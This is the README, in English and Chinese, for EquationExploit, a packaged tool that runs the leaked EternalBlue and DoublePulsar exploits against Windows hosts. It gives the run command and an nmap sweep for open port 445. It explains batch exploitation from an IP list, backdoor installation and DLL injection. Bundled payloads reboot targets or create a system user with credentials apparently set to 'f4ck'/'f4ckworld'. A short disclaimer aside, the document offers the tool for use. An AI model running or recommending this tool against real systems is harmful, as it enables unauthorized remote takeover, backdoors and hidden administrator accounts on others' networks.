EquationExploit
Eternalblue Doublepulsar exploit
Disclaimer
This program is only for testing security and you must comply with local laws. Otherwise, please immediately turn off and delete the program.
Usage
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
Batch use
ip.txt
192.168.0.2
192.168.0.3
中文README
免责声明
此程序仅用于测试安全性,您必须遵守当地法律。 否则,请立即关闭并删除程序。
简介
方程式组织泄露的漏洞利用工具。
环境:windows主机组成的内网环境。 效果:批量执行dll命令。
扫描目标主机
可借助nmap 扫描445端口开放的主机
nmap 192.168.0-255.0/24 -p 445 --open
用法
java -jar EquationExploit-1.0-SNAPSHOT-jar-with-dependencies.jar
所有选项都有默认项,回车键即可。
选项 - 选择exploit
注意顺序 Eternalble:安装backdoor Doublepulsar:执行相关操作
选项 - 批量利用
两个exploit都有这个选项:
input TargetIpAddress or list (default. will use ip.txt):
在这一步除非输入IP地址,否则默认为批量利用:依次测试ip.txt中的ip
内容格式:一行一个ip
192.168.0.2
192.168.0.3
选项 - payloadDllname指定注入目标机目标进程的dll文件
- dll跟目标机系统架构有关:x86用x86的dll文件,x64用x64的dll文件
- 文件夹dlls中自带了一些dll文件(附说明),默认为x64createSysUser.dll
- 在文件夹中放入自己的dll文件,如x.dll 输入x.dll即可
dll功能说明
X64reboot.dll X86reboot.dll
shutdown -r
x64createSysUser.dll x86createSysUser.dll
f4ck
f4ckworld